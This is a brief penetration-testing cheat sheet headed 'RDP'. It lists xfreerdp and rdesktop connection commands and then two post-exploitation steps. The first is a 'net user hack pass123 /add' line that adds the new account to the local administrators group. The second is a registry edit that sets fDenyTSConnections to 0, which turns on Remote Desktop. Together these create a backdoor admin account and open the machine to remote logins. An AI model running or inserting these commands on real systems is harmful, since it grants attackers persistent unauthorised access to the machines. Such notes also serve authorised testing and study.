RDP

xfreerdp /d:<domain> /u:<user> /v:<target machine ip> +clipboard

rdesktop 10.11.0.22 -u hack -p pass123 -g 1024x768 -x 0x80

net user hack pass123 /add && net localgroup administrators hack /add

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Last updated